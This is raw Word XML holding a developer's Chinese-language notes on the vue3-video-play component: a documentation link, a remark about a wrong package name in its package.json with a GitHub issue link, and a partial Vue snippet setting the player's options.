    <w:p w14:paraId="11C30FB0" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="00181907" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033D7AE1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689FB618" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5219A4F1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD98373" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F949AB4" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FFF9FC" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3125DF23" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="00181907" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14EE0A1A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B063D66" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096E1D24" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6060B290" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78AF18E6" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705B208B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72FC7166" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="00181907" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59974E77" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAA012D" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FBDBF0" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19314FB2" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CB1A69" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C0F134" w14:textId="074E6BF9" w:rsidR="008D57F2" w:rsidRDefault="00347805" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="713" w:name="_Toc159780143"/>
      <w:r w:rsidRPr="00347805">
        <w:t>vue3-video-play</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>播放视频</w:t>
      </w:r>
      <w:bookmarkEnd w:id="713"/>
    </w:p>
    <w:p w14:paraId="11F24789" w14:textId="020ACC2A" w:rsidR="008D57F2" w:rsidRPr="00181907" w:rsidRDefault="00347805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00347805">
        <w:t>https://codelife.cc/vue3-video-play/guide/install.html#%E5%8A%9F%E8%83%BD%E4%B8%80%E8%A7%88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF1F20" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5AE927" w14:textId="39F19372" w:rsidR="006A0E58" w:rsidRDefault="006A0E58" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坑点：内部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:t>.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidR="00936F1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，名字不对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F27C11D" w14:textId="77777777" w:rsidR="00652D34" w:rsidRDefault="00652D34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B717371" w14:textId="72EF09D9" w:rsidR="00652D34" w:rsidRDefault="00652D34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00652D34">
        <w:t>https://github.com/xdlumia/vue3-video-play/issues/139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B99166F" w14:textId="0355937C" w:rsidR="006A0E58" w:rsidRDefault="006A0E58" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A0E58">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23ED6F80" wp14:editId="03C1E314">
            <wp:extent cx="10708640" cy="7788448"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1732708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0716979" cy="7794513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE1AC2" w14:textId="77777777" w:rsidR="00347805" w:rsidRDefault="00347805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438812D2" w14:textId="77777777" w:rsidR="00347805" w:rsidRDefault="00347805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592C3736" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104EEC76" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-main class="image-main"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED2162D" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        &lt;!-- &lt;div class="top"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA995BD" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;div v-for="i in 100" :key="i"&gt;{{ i }}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E241E3" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73066D37" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div class="bottom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5898C952" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分页区域</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78702FD1" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E76DC0" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;videoPlay v-bind="options" poster="https://cdn.jsdelivr.net/gh/xdlumia/files/video-play/ironMan.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A05F1" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            :src="videoSource" logo="https://www.nuc.edu.cn/images/nuc2018_08.png" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1572A1F5" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-main&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BBEF56" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D9A1CD" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59BC9191" w14:textId="1850336A" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32295705" w14:textId="77777777" w:rsidR="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FC3181" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>视频播放组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44042823" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import "vue3-video-play/dist/style.css";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E848D5F" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import Vue3VideoPlay from "vue3-video-play";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E305A5D" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export default {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50078E81" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    components: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF2DA48" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        videoPlay: Vue3VideoPlay,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BACD9D2" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D02B6" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CDED83" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    data() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D9BEB" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        const options = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF384B3" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            width: "1300px", //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>播放器宽度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0836AA50" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            height: "700px", //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>播放器高度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34306607" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            color: "#409eff", //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>主题色</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC6DF67" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            title: "", //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>视频名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B75497C" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            muted: false, //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>静音</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D90F66E" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            webFullScreen: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4AD8BD" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            speedRate: ["0.75", "1.0", "1.25", "1.5", "2.0"], //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>播放倍速</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B69B162" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            autoPlay: false, //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>自动播放</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6FE01" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            loop: true, //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>循环播放</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B3A83" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            mirror: false, //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>镜像画面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D09EBD" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            ligthOff: false, //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关灯模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086688E9" w14:textId="77777777" w:rsidR="004B180B" w:rsidRPr="004B180B" w:rsidRDefault="004B180B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            volume: 0.3, //</w:t>
      </w:r>
      <w:r w:rsidRPr="004B180B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
